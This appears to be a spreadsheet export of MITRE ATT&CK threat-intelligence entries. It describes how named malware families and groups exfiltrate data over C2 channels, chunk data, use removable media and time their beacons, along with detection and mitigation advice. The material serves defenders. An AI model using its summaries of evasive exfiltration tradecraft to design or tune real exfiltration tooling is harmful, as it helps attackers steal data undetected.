Cyclops Blink
[Cyclops Blink](https://attack.mitre.org/software/S0687) has the ability to upload exfiltrated files to a C2 server.(Citation: NCSC Cyclops Blink February 2022)
DnsSystem
[DnsSystem](https://attack.mitre.org/software/S1021) can exfiltrate collected data to its C2 server.(Citation: Zscaler Lyceum DnsSystem June 2022)
Doki
[Doki](https://attack.mitre.org/software/S0600) has used Ngrok to establish C2 and exfiltrate data.(Citation: Intezer Doki July 20)
Drovorub
[Drovorub](https://attack.mitre.org/software/S0502) can exfiltrate files over C2 infrastructure.(Citation: NSA/FBI Drovorub August 2020)
DustySky
[DustySky](https://attack.mitre.org/software/S0062) has exfiltrated data to the C2 server.(Citation: Kaspersky MoleRATs April 2019)
Dyre
[Dyre](https://attack.mitre.org/software/S0024) has the ability to send information staged on a compromised host externally to C2.(Citation: Malwarebytes Dyreza November 2015)
EVILNUM
[EVILNUM](https://attack.mitre.org/software/S0568) can upload files over the C2 channel from the infected host.(Citation: Prevailion EvilNum May 2020) 
Ebury
[Ebury](https://attack.mitre.org/software/S0377) can exfiltrate SSH credentials through custom DNS queries.(Citation: ESET Windigo Mar 2014)
Emotet
[Emotet](https://attack.mitre.org/software/S0367) has exfiltrated data over its C2 channel.(Citation: Trend Micro Emotet Jan 2019)(Citation: Binary Defense Emotes Wi-Fi Spreader)
Empire
[Empire](https://attack.mitre.org/software/S0363) can send data gathered from a target through the command and control channel.(Citation: Github PowerShell Empire)(Citation: Talos Frankenstein June 2019)
Flagpro
[Flagpro](https://attack.mitre.org/software/S0696) has exfiltrated data to the C2 server.(Citation: NTT Security Flagpro new December 2021) 
FlawedAmmyy
[FlawedAmmyy](https://attack.mitre.org/software/S0381) has sent data collected from a compromised host to its C2 servers.(Citation: Korean FSI TA505 2020)
FoggyWeb
[FoggyWeb](https://attack.mitre.org/software/S0661) can remotely exfiltrate sensitive information from a compromised AD FS server.(Citation: MSTIC FoggyWeb September 2021)
FunnyDream
[FunnyDream](https://attack.mitre.org/software/S1044) can execute commands, including gathering user information, and send the results to C2.(Citation: Bitdefender FunnyDream Campaign November 2020)
GoldMax
[GoldMax](https://attack.mitre.org/software/S0588) can exfiltrate files over the existing C2 channel.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)
GoldenSpy
[GoldenSpy](https://attack.mitre.org/software/S0493) has exfiltrated host environment information to an external C2 domain via port 9006.(Citation: Trustwave GoldenSpy June 2020)	
Goopy
[Goopy](https://attack.mitre.org/software/S0477) has the ability to exfiltrate data over the Microsoft Outlook C2 channel.(Citation: Cybereason Cobalt Kitty 2017)
Grandoreiro
[Grandoreiro](https://attack.mitre.org/software/S0531) can send data it retrieves to the C2 server.(Citation: ESET Grandoreiro April 2020)
GrimAgent
[GrimAgent](https://attack.mitre.org/software/S0632) has sent data related to a compromise host over its C2 channel.(Citation: Group IB GrimAgent July 2021)
HAWKBALL
[HAWKBALL](https://attack.mitre.org/software/S0391) has sent system information and files over the C2 channel.(Citation: FireEye HAWKBALL Jun 2019)
HOPLIGHT
[HOPLIGHT](https://attack.mitre.org/software/S0376) has used its C2 channel to exfiltrate data.(Citation: US-CERT HOPLIGHT Apr 2019)	
HotCroissant
[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to download files from the infected host to the command and control (C2) server.(Citation: Carbon Black HotCroissant April 2020)
IceApple
[IceApple](https://attack.mitre.org/software/S1022)'s Multi File Exfiltrator module can exfiltrate multiple files from a compromised host as an HTTP response over C2.(Citation: CrowdStrike IceApple May 2022) 
Imminent Monitor
[Imminent Monitor](https://attack.mitre.org/software/S0434) has uploaded a file containing debugger logs, network information and system information to the C2.(Citation: QiAnXin APT-C-36 Feb2019)
Industroyer
[Industroyer](https://attack.mitre.org/software/S0604) sends information about hardware profiles and previously-received commands back to the C2 server in a POST-request.(Citation: ESET Industroyer)
KGH_SPY
[KGH_SPY](https://attack.mitre.org/software/S0526) can exfiltrate collected information from the host to the C2 server.(Citation: Cybereason Kimsuky November 2020)
KONNI
[KONNI](https://attack.mitre.org/software/S0356) has sent data and files to its C2 server.(Citation: Talos Konni May 2017)(Citation: Malwarebytes Konni Aug 2021)(Citation: Malwarebytes KONNI Evolves Jan 2022)
KOPILUWAK
[KOPILUWAK](https://attack.mitre.org/software/S1075) has exfiltrated collected data to its C2 via POST requests.(Citation: Mandiant Suspected Turla Campaign February 2023)
Kessel
[Kessel](https://attack.mitre.org/software/S0487) has exfiltrated information gathered from the infected system to the C2 server.(Citation: ESET ForSSHe December 2018)
Kevin
[Kevin](https://attack.mitre.org/software/S1020) can send data from the victim host through a DNS C2 channel.(Citation: Kaspersky Lyceum October 2021)
LightNeuron
[LightNeuron](https://attack.mitre.org/software/S0395) exfiltrates data over its email C2 channel.(Citation: ESET LightNeuron May 2019)
LitePower
[LitePower](https://attack.mitre.org/software/S0680) can send collected data, including screenshots, over its C2 channel.(Citation: Kaspersky WIRTE November 2021)
Lokibot
[Lokibot](https://attack.mitre.org/software/S0447) has the ability to initiate contact with command and control (C2) to exfiltrate stolen data.(Citation: FSecure Lokibot November 2019)
MacMa
[MacMa](https://attack.mitre.org/software/S1016) exfiltrates data from a supplied path over its C2 channel.(Citation: ESET DazzleSpy Jan 2022)
Machete
[Machete](https://attack.mitre.org/software/S0409)'s collected data is exfiltrated over the same channel used for C2.(Citation: ESET Machete July 2019)
Mafalda
[Mafalda](https://attack.mitre.org/software/S1060) can send network system data and files to its C2 server.(Citation: SentinelLabs Metador Sept 2022)
MarkiRAT
[MarkiRAT](https://attack.mitre.org/software/S0652) can exfiltrate locally stored data via its C2.(Citation: Kaspersky Ferocious Kitten Jun 2021)
MechaFlounder
[MechaFlounder](https://attack.mitre.org/software/S0459) has the ability to send the compromised user's account name and hostname within a URL to C2.(Citation: Unit 42 MechaFlounder March 2019)
Metamorfo
[Metamorfo](https://attack.mitre.org/software/S0455) can send the data it collects to the C2 server.(Citation: ESET Casbaneiro Oct 2019) 
Mis-Type
[Mis-Type](https://attack.mitre.org/software/S0084) has transmitted collected files and data to its C2 server.(Citation: Cylance Dust Storm)
Misdat
[Misdat](https://attack.mitre.org/software/S0083) has uploaded files and data to its C2 servers.(Citation: Cylance Dust Storm)
MobileOrder
[MobileOrder](https://attack.mitre.org/software/S0079) exfiltrates data to its C2 server over the same protocol as C2 communications.(Citation: Scarlet Mimic Jan 2016)
Mongall
[Mongall](https://attack.mitre.org/software/S1026) can upload files and information from a compromised host to its C2 server.(Citation: SentinelOne Aoqin Dragon June 2022)
NETEAGLE
[NETEAGLE](https://attack.mitre.org/software/S0034) is capable of reading files over the C2 channel.(Citation: FireEye APT30)
NightClub
[NightClub](https://attack.mitre.org/software/S1090) can use SMTP and DNS for file exfiltration and C2.(Citation: MoustachedBouncer ESET August 2023)
Octopus
[Octopus](https://attack.mitre.org/software/S0340) has uploaded stolen files and data from a victim's machine over its C2 channel.(Citation: Securelist Octopus Oct 2018)
Okrum
Data exfiltration is done by [Okrum](https://attack.mitre.org/software/S0439) using the already opened channel with the C2 server.(Citation: ESET Okrum July 2019)
OopsIE
[OopsIE](https://attack.mitre.org/software/S0264) can upload files from the victim's machine to its C2 server.(Citation: Unit 42 OopsIE! Feb 2018)
OutSteel
[OutSteel](https://attack.mitre.org/software/S1017) can upload files from a compromised host over its C2 channel.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ) 
PcShare
[PcShare](https://attack.mitre.org/software/S1050) can upload files and information from a compromised host to its C2 servers.(Citation: Bitdefender FunnyDream Campaign November 2020)
Penquin
[Penquin](https://attack.mitre.org/software/S0587) can execute the command code &lt;code&gt;do_upload&lt;/code&gt; to send files to C2.(Citation: Leonardo Turla Penquin May 2020)
PingPull
[PingPull](https://attack.mitre.org/software/S1031) has the ability to exfiltrate stolen victim data through its C2 channel.(Citation: Unit 42 PingPull Jun 2022)
PoetRAT
[PoetRAT](https://attack.mitre.org/software/S0428) has exfiltrated data over the C2 channel.(Citation: Talos PoetRAT October 2020)
PowerShower
[PowerShower](https://attack.mitre.org/software/S0441) has used a PowerShell document stealer module to pack and exfiltrate .txt, .pdf, .xls or .doc files smaller than 5MB that were modified during the past two days.(Citation: Kaspersky Cloud Atlas August 2019)
Proxysvc
[Proxysvc](https://attack.mitre.org/software/S0238) performs data exfiltration over the control server channel using a custom protocol.(Citation: McAfee GhostSecret)
Psylo
[Psylo](https://attack.mitre.org/software/S0078) exfiltrates data to its C2 server over the same protocol as C2 communications.(Citation: Scarlet Mimic Jan 2016)
Pteranodon
[Pteranodon](https://attack.mitre.org/software/S0147) exfiltrates screenshot files to its C2 server.(Citation: Palo Alto Gamaredon Feb 2017)
Pupy
[Pupy](https://attack.mitre.org/software/S0192) can send screenshots files, keylogger data, files, and recorded audio back to the C2 server.(Citation: GitHub Pupy)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) can send stolen information to C2 nodes including passwords, accounts, and emails.(Citation: Kaspersky QakBot September 2021)
RDAT
[RDAT](https://attack.mitre.org/software/S0495) can exfiltrate data gathered from the infected system via the established Exchange Web Services API C2 channel.(Citation: Unit42 RDAT July 2020)
REvil
[REvil](https://attack.mitre.org/software/S0496) can exfiltrate host and malware information to C2 servers.(Citation: Secureworks REvil September 2019)
ROKRAT
[ROKRAT](https://attack.mitre.org/software/S0240) can send collected files back over same C2 channel.(Citation: Talos ROKRAT)
Remexi
[Remexi](https://attack.mitre.org/software/S0375) performs exfiltration over [BITSAdmin](https://attack.mitre.org/software/S0190), which is also used for the C2 channel.(Citation: Securelist Remexi Jan 2019)
Rising Sun
[Rising Sun](https://attack.mitre.org/software/S0448) can send data gathered from the infected machine via HTTP POST request to the C2.(Citation: McAfee Sharpshooter December 2018)	
RotaJakiro
[RotaJakiro](https://attack.mitre.org/software/S1078) sends device and other collected data back to the C2 using the established C2 channels over TCP. (Citation: RotaJakiro 2021 netlab360 analysis)
S-Type
[S-Type](https://attack.mitre.org/software/S0085) has uploaded data and files from a compromised host to its C2 servers.(Citation: Cylance Dust Storm)
SDBbot
[SDBbot](https://attack.mitre.org/software/S0461) has sent collected data from a compromised host to its C2 servers.(Citation: Korean FSI TA505 2020)
SILENTTRINITY
[SILENTTRINITY](https://attack.mitre.org/software/S0692) can transfer files from an infected host to the C2 server.(Citation: GitHub SILENTTRINITY Modules July 2019)
SLOTHFULMEDIA
[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has sent system information to a C2 server via HTTP and HTTPS POST requests.(Citation: CISA MAR SLOTHFULMEDIA October 2020)
SMOKEDHAM
[SMOKEDHAM](https://attack.mitre.org/software/S0649) has exfiltrated data to its C2 server.(Citation: FireEye SMOKEDHAM June 2021)
STARWHALE
[STARWHALE](https://attack.mitre.org/software/S1037) can exfiltrate collected data to its C2 servers.(Citation: DHS CISA AA22-055A MuddyWater February 2022)
SUGARDUMP
[SUGARDUMP](https://attack.mitre.org/software/S1042) has sent stolen credentials and other data to its C2 server.(Citation: Mandiant UNC3890 Aug 2022)
SVCReady
[SVCReady](https://attack.mitre.org/software/S1064) can send collected data in JSON format to its C2 server.(Citation: HP SVCReady Jun 2022) 
Shark
[Shark](https://attack.mitre.org/software/S1019) has the ability to upload files from the compromised host over a DNS or HTTP C2 channel.(Citation: ClearSky Siamesekitten August 2021)
SharpDisco
[SharpDisco](https://attack.mitre.org/software/S1089) can load a plugin to exfiltrate stolen files to SMB shares also used in C2.(Citation: MoustachedBouncer ESET August 2023)
ShimRatReporter
[ShimRatReporter](https://attack.mitre.org/software/S0445) sent generated reports to the C2 via HTTP POST requests.(Citation: FOX-IT May 2016 Mofang)
SideTwist
[SideTwist](https://attack.mitre.org/software/S0610) has exfiltrated data over its C2 channel.(Citation: Check Point APT34 April 2021)
Sliver
[Sliver](https://attack.mitre.org/software/S0633) can exfiltrate files from the victim using the &lt;code&gt;download&lt;/code&gt; command.(Citation: GitHub Sliver Download)
SombRAT
[SombRAT](https://attack.mitre.org/software/S0615) has uploaded collected data and files from a compromised host to its C2 server.(Citation: BlackBerry CostaRicto November 2020)
Spark
[Spark](https://attack.mitre.org/software/S0543) has exfiltrated data over the C2 channel.(Citation: Unit42 Molerat Mar 2020) 
Squirrelwaffle
[Squirrelwaffle](https://attack.mitre.org/software/S1030) has exfiltrated victim data using HTTP POST requests to its C2 servers.(Citation: ZScaler Squirrelwaffle Sep 2021)
StrifeWater
[StrifeWater](https://attack.mitre.org/software/S1034) can send data and files from a compromised host to its C2 server.(Citation: Cybereason StrifeWater Feb 2022)
StrongPity
[StrongPity](https://attack.mitre.org/software/S0491) can exfiltrate collected documents through C2 channels.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)
Stuxnet
[Stuxnet](https://attack.mitre.org/software/S0603) sends compromised victim information via HTTP.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
SysUpdate
[SysUpdate](https://attack.mitre.org/software/S0663) has exfiltrated data over its C2 channel.(Citation: Lunghi Iron Tiger Linux)
TajMahal
[TajMahal](https://attack.mitre.org/software/S0467) has the ability to send collected files over its C2.(Citation: Kaspersky TajMahal April 2019)
ThiefQuest
[ThiefQuest](https://attack.mitre.org/software/S0595) exfiltrates targeted file extensions in the &lt;code&gt;/Users/&lt;/code&gt; folder to the command and control server via unencrypted HTTP. Network packets contain a string with two pieces of information: a file path and the contents of the file in a base64 encoded string.(Citation: wardle evilquest partii)(Citation: reed thiefquest ransomware analysis)
Tomiris
 [Tomiris](https://attack.mitre.org/software/S0671) can upload files matching a hardcoded set of extensions, such as .doc, .docx, .pdf, and .rar, to its C2 server.(Citation: Kaspersky Tomiris Sep 2021)
Torisma
[Torisma](https://attack.mitre.org/software/S0678) can send victim data to an actor-controlled C2 server.(Citation: McAfee Lazarus Nov 2020)
TrickBot
[TrickBot](https://attack.mitre.org/software/S0266) can send information about the compromised host and upload data to a hardcoded C2 server.(Citation: Cyberreason Anchor December 2019)(Citation: Bitdefender Trickbot VNC module Whitepaper 2021)
Ursnif
[Ursnif](https://attack.mitre.org/software/S0386) has used HTTP POSTs to exfil gathered information.(Citation: TrendMicro Ursnif Mar 2015)(Citation: FireEye Ursnif Nov 2017)(Citation: ProofPoint Ursnif Aug 2016)
Valak
[Valak](https://attack.mitre.org/software/S0476) has the ability to exfiltrate data over the C2 channel.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)(Citation: SentinelOne Valak June 2020)
WarzoneRAT
[WarzoneRAT](https://attack.mitre.org/software/S0670) can send collected victim data to its C2 server.(Citation: Check Point Warzone Feb 2020)
Woody RAT
[Woody RAT](https://attack.mitre.org/software/S1065) can exfiltrate files from an infected machine to its C2 server.(Citation: MalwareBytes WoodyRAT Aug 2022) 
XCSSET
[XCSSET](https://attack.mitre.org/software/S0658) exfiltrates data stolen from a system over its C2 channel.(Citation: trendmicro xcsset xcode project 2020)
ZLib
[ZLib](https://attack.mitre.org/software/S0086) has sent data and files from a compromised host to its C2 servers.(Citation: Cylance Dust Storm)
Zebrocy
[Zebrocy](https://attack.mitre.org/software/S0251) has exfiltrated data to the designated C2 server using HTTP POST requests.(Citation: Accenture SNAKEMACKEREL Nov 2018)(Citation: CISA Zebrocy Oct 2020) 
metaMain
[metaMain](https://attack.mitre.org/software/S1059) can upload collected files and data to its C2 server.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)
njRAT
[njRAT](https://attack.mitre.org/software/S0385) has used HTTP to receive stolen information from the infected machine.(Citation: Trend Micro njRAT 2018)	
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Connection Creation
Monitor for newly constructed network connections that are sent or received by untrusted hosts or uncommon data flows (e.g. unusual network communications or suspicious communications sending fixed size data packets at regular intervals as well as unusually long connection patterns). Consider analyzing packet contents to detect application layer protocols, leveraging SSL/TLS inspection for encrypted traffic, that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, protocol port mismatch, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments (e.g. monitor anomalies in use of files that do not normally initiate network connections or unusual connections initiated
Network Traffic Flow
Monitor and analyze traffic flows that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, or gratuitous or anomalous traffic patterns). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).
Network Intrusion Prevention
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary command and control infrastructure and malware can be used to mitigate activity at the network level.
C0015
During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors limited [Rclone](https://attack.mitre.org/software/S1040)'s bandwidth setting during exfiltration.(Citation: DFIR Conti Bazar Nov 2021) 
C0026
During [C0026](https://attack.mitre.org/campaigns/C0026), the threat actors split encrypted archives containing stolen files and information into 3MB parts prior to exfiltration.(Citation: Mandiant Suspected Turla Campaign February 2023)
APT28
[APT28](https://attack.mitre.org/groups/G0007) has split archived exfiltration files into chunks smaller than 1MB.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
LuminousMoth
[LuminousMoth](https://attack.mitre.org/groups/G1014) has split archived files into multiple parts to bypass a 5MB limit.(Citation: Bitdefender LuminousMoth July 2021)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) actors have split RAR files for exfiltration into parts.(Citation: Dell TG-3390)
AppleSeed
[AppleSeed](https://attack.mitre.org/software/S0622) has divided files if the size is 0x1000000 bytes or more.(Citation: KISA Operation Muzabi)
Carbanak
[Carbanak](https://attack.mitre.org/software/S0030) exfiltrates data in compressed chunks if a message is larger than 4096 bytes .(Citation: FireEye CARBANAK June 2017)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) will break large data sets into smaller chunks for exfiltration.(Citation: cobaltstrike manual)
Helminth
[Helminth](https://attack.mitre.org/software/S0170) splits data into chunks up to 23 bytes and sends the data in DNS queries to its C2 server.(Citation: Palo Alto OilRig May 2016)
Kessel
[Kessel](https://attack.mitre.org/software/S0487) can split the data to be exilftrated into chunks that will fit in subdomains of DNS queries.(Citation: ESET ForSSHe December 2018)
Kevin
[Kevin](https://attack.mitre.org/software/S1020) can exfiltrate data to the C2 server in 27-character chunks.(Citation: Kaspersky Lyceum October 2021)
Mythic
[Mythic](https://attack.mitre.org/software/S0699) supports custom chunk sizes used to upload/download files.(Citation: Mythc Documentation)	
ObliqueRAT
[ObliqueRAT](https://attack.mitre.org/software/S0644) can break large files of interest into smaller chunks to prepare them for exfiltration.(Citation: Talos Oblique RAT March 2021)
OopsIE
[OopsIE](https://attack.mitre.org/software/S0264) exfiltrates command output and collected files to its C2 server in 1500-byte blocks.(Citation: Unit 42 OopsIE! Feb 2018)
POSHSPY
[POSHSPY](https://attack.mitre.org/software/S0150) uploads data in 2048-byte chunks.(Citation: FireEye POSHSPY April 2017)
RDAT
[RDAT](https://attack.mitre.org/software/S0495) can upload a file via HTTP POST response to the C2 split into 102,400-byte portions. [RDAT](https://attack.mitre.org/software/S0495) can also download data from the C2 which is split into 81,920-byte portions.(Citation: Unit42 RDAT July 2020)	
Rclone
The [Rclone](https://attack.mitre.org/software/S1040) "chunker" overlay supports splitting large files in smaller chunks during upload to circumvent size limits.(Citation: Rclone)(Citation: DFIR Conti Bazar Nov 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may attempt to exfiltrate data over a USB connected physical device.
Drive Creation
Monitor for newly assigned drive letters or mount points to a data storage device that may attempt to exfiltrate data over a USB connected physical device.
File Access
Monitor file access on removable media that may attempt to exfiltrate data over a USB connected physical device.
Process Creation
Monitor for newly executed processes when removable media is mounted 
Data Loss Prevention
Data loss prevention can detect and block sensitive data being copied to USB devices.
Disable or Remove Feature or Program
Disable Autorun if it is unnecessary. (Citation: Microsoft Disable Autorun) Disallow or restrict removable media at an organizational policy level if they are not required for business operations. (Citation: TechNet Removable Media Control)
Limit Hardware Installation
Limit the use of USB devices and removable media within a network.
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) has used a customized [PlugX](https://attack.mitre.org/software/S0013) variant which could exfiltrate documents from air-gapped networks.(Citation: Avira Mustang Panda January 2020)
Tropic Trooper
[Tropic Trooper](https://attack.mitre.org/groups/G0081) has exfiltrated data using USB storage devices.(Citation: TrendMicro Tropic Trooper May 2020)	
Agent.btz
[Agent.btz](https://attack.mitre.org/software/S0092) creates a file named thumb.dd on all USB flash drives connected to the victim. This file contains information about the infected system and activity logs.(Citation: Securelist Agent.btz)
Machete
[Machete](https://attack.mitre.org/software/S0409) has a feature to copy files from every drive onto a removable drive in a hidden folder.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014)
Remsec
[Remsec](https://attack.mitre.org/software/S0125) contains a module to move data from airgapped networks to Internet-connected systems by using a removable USB device.(Citation: Kaspersky ProjectSauron Full Report)
SPACESHIP
[SPACESHIP](https://attack.mitre.org/software/S0035) copies staged data to removable drives when they are inserted into the system.(Citation: FireEye APT30)
USBStealer
[USBStealer](https://attack.mitre.org/software/S0136) exfiltrates collected files via removable media from air-gapped victims.(Citation: ESET Sednit USBStealer 2014)
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Connection Creation
Monitor for newly constructed network connections that are sent or received by untrusted hosts. 
Network Traffic Flow
Monitor for network traffic originating from unknown/unexpected hardware devices. Local network traffic metadata (such as source MAC addressing) as well as usage of network management protocols such as DHCP may be helpful in identifying hardware.
Network Intrusion Prevention
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary command and control infrastructure and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command and control signatures over time or construct protocols in such a way to avoid detection by common defensive tools. (Citation: University of Birmingham C2)
Higaisa
[Higaisa](https://attack.mitre.org/groups/G0126) sent the victim computer identifier in a User-Agent string back to the C2 server every 10 minutes.(Citation: PTSecurity Higaisa 2020)
ADVSTORESHELL
[ADVSTORESHELL](https://attack.mitre.org/software/S0045) collects, compresses, encrypts, and exfiltrates data to the C2 server every 10 minutes.(Citation: ESET Sednit Part 2)
Chrommme
[Chrommme](https://attack.mitre.org/software/S0667) can set itself to sleep before requesting a new command from C2.(Citation: ESET Gelsemium June 2021)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can set its Beacon payload to reach out to the C2 server on an arbitrary and random interval.(Citation: cobaltstrike manual)
ComRAT
[ComRAT](https://attack.mitre.org/software/S0126) has been programmed to sleep outside local business hours (9 to 5, Monday to Friday).(Citation: ESET ComRAT May 2020)
Dipsind
[Dipsind](https://attack.mitre.org/software/S0200) can be configured to only run during normal working hours, which would make its communications harder to distinguish from normal traffic.(Citation: Microsoft PLATINUM April 2016)
Flagpro
[Flagpro](https://attack.mitre.org/software/S0696) has the ability to wait for a specified time interval between communicating with and executing commands from C2.(Citation: NTT Security Flagpro new December 2021)
Kazuar
[Kazuar](https://attack.mitre.org/software/S0265) can sleep for a specific time and be set to communicate at specific intervals.(Citation: Unit 42 Kazuar May 2017)
LightNeuron
[LightNeuron](https://attack.mitre.org/software/S0395) can be configured to exfiltrate data during nighttime or working hours.(Citation: ESET LightNeuron May 2019)
Linfo
[Linfo](https://attack.mitre.org/software/S0211) creates a backdoor through which remote attackers can change the frequency at which compromised hosts contact remote C2 infrastructure.(Citation: Symantec Linfo May 2012)
Machete
[Machete](https://attack.mitre.org/software/S0409) sends stolen data to the C2 server every 10 minutes.(Citation: ESET Machete July 2019) 
POWERSTATS
[POWERSTATS](https://attack.mitre.org/software/S0223) can sleep for a given number of seconds.(Citation: FireEye MuddyWater Mar 2018)
ShadowPad
[ShadowPad](https://attack.mitre.org/software/S0596) has sent data back to C2 every 8 hours.(Citation: Securelist ShadowPad Aug 2017)
Shark
[Shark](https://attack.mitre.org/software/S1019) can pause C2 communications for a specified time.(Citation: ClearSky Siamesekitten August 2021)
ShimRat
[ShimRat](https://attack.mitre.org/software/S0444) can sleep when instructed to do so by the C2.(Citation: FOX-IT May 2016 Mofang)	
TinyTurla
[TinyTurla](https://attack.mitre.org/software/S0668) contacts its C2 based on a scheduled timing set in its configuration.(Citation: Talos TinyTurla September 2021)
jRAT
[jRAT](https://attack.mitre.org/software/S0283) can be configured to reconnect at certain intervals.(Citation: Kaspersky Adwind Feb 2016)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may attempt to exfiltrate data via a physical medium, such as a removable drive.
Drive Creation
Monitor for newly assigned drive letters or mount points to a data storage device that may attempt to exfiltrate data via a physical medium, such as a removable drive.
File Access
Monitor file access on removable media that may attempt to exfiltrate data via a physical medium, such as a removable drive.
Process Creation
Monitor for newly executed processes when removable media is mounted.
Data Loss Prevention
Data loss prevention can detect and block sensitive data being copied to physical mediums.
Disable or Remove Feature or Program
Disable Autorun if it is unnecessary. (Citation: Microsoft Disable Autorun) Disallow or restrict removable media at an organizational policy level if they are not required for business operations. (Citation: TechNet Removable Media Control)
Limit Hardware Installation
Limit the use of USB devices and removable media within a network.
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel.
File Access
Monitor for files viewed in isolation that may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel.
Network Connection Creation
Monitor for newly constructed network connections that are sent or received by untrusted hosts.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Filter Network Traffic
Enforce proxies and use dedicated servers for services such as DNS and only allow those systems to communicate over respective ports/protocols, instead of all systems within a network. 
Network Intrusion Prevention
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary command and control infrastructure and malware can be used to mitigate activity at the network level. 
Network Segmentation
Follow best practices for network firewall configurations to allow only necessary ports and traffic to enter and exit the network.(Citation: TechNet Firewall Design)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may attempt to exfiltrate data over a different network medium than the command and control channel
File Access
Monitor for files being accessed that could be related to exfiltration, such as file reads by a process that also has an active network connection.
Network Connection Creation
Monitor for newly constructed network connections that may attempt to exfiltrate data over a different network medium than the command and control channel. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.
Note: Network Analysis frameworks such as Zeek can be used to capture, decode, and alert on TCP network connection creation. The below analytic is using an event ID from OSQuery. 
&lt;h4&gt;Analytic 1 - Windows Process Network Connection &lt;/h4&gt;
&lt;code&gt;netcon_from_sysproc = filter process_open_sockets where remote_port != 0 AND proc_name!= '';"&lt;/code&gt;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such as the usage of abnormal/unexpected protocols.
Disable or Remove Feature or Program
Disable WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel in local computer security settings or by group policy if it is not needed within an environment.
Operating System Configuration
Prevent the creation of new network adapters where possible.(Citation: Microsoft GPO Bluetooth FEB 2009)(Citation: TechRepublic Wireless GPO FEB 2009)
</t>
  </si>
  <si>
    <t xml:space="preserve">Cloud Storage Creation
Monitor account activity for attempts to create and share data, such as snapshots or backups, with untrusted or unusual accounts.
Cloud Storage Metadata
Periodically baseline cloud storage infrastructure to identify malicious modifications or additions.
Cloud Storage Modification
Monitor for anomalous file transfer activity between accounts and/or to untrusted/unexpected VPCs.
Network Traffic Content
Monitor network traffic content for evidence of data exfiltration, such as gratuitous or anomalous internal traffic containing collected data. Consider correlation with process monitoring and command lines associated with collection and exfiltration.
Snapshot Creation
Monitor account activity for attempts to create and share data, such as snapshots or backups, with untrusted or unusual accounts.
Snapshot Metadata
Periodically baseline snapshots to identify malicious modifications or additions.
Snapshot Modification
Monitor account activity for attempts to share data, snapshots, or backups with untrusted or unusual accounts on the same cloud service provider. Monitor for anomalous file transfer activity between accounts and to untrusted VPCs.
Filter Network Traffic
Implement network-based filtering restrictions to prohibit data transfers to untrusted VPCs.
Password Policies
Consider rotating access keys within a certain number of days to reduce the effectiveness of stolen credentials.
User Account Management
Limit user account and IAM policies to the least privileges required. Consider using temporary credentials for accounts that are only valid for a certain period of time to reduce the effectiveness of compromised accounts.
</t>
  </si>
  <si>
    <t xml:space="preserve">Firmware Modification
Monitor for changes made to the firmware for unexpected modifications to settings and/or data. (Citation: MITRE Trustworthy Firmware Measurement) Log attempts to read/write to BIOS and compare against known patching behavior.
Boot Integrity
Check the integrity of the existing BIOS and device firmware to determine if it is vulnerable to modification.
Privileged Account Management
Prevent adversary access to privileged accounts or access necessary to replace system firmware.
Update Software
Patch the BIOS and other firmware as necessary to prevent successful use of known vulnerabilities.
Bad Rabbit
[Bad Rabbit](https://attack.mitre.org/software/S0606) has used an executable that installs a modified bootloader to prevent normal boot-up.(Citation: Secure List Bad Rabbit)
TrickBot
[TrickBot](https://attack.mitre.org/software/S0266) module "Trickboot" can write or erase the UEFI/BIOS firmware of a compromised device.(Citation: Eclypsium Trickboot December 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Host Status
Detection of Network DoS can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Monitor for logging, messaging, and other artifacts highlighting the health of host sensors (ex: metrics, errors, and/or exceptions from logging applications)
Network Traffic Flow
Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.
Filter Network Traffic
When flood volumes exceed the capacity of the network connection being targeted, it is typically necessary to intercept the incoming traffic upstream to filter out the attack traffic from the legitimate traffic. Such defenses can be provided by the hosting Internet Service Provider (ISP) or by a 3rd party such as a Content Delivery Network (CDN) or providers specializing in DoS mitigations.(Citation: CERT-EU DDoS March 2017)
Depending on flood volume, on-premises filtering may be possible by blocking source addresses sourcing the attack, blocking ports that are being targeted, or blocking protocols being used for transport.(Citation: CERT-EU DDoS March 2017)
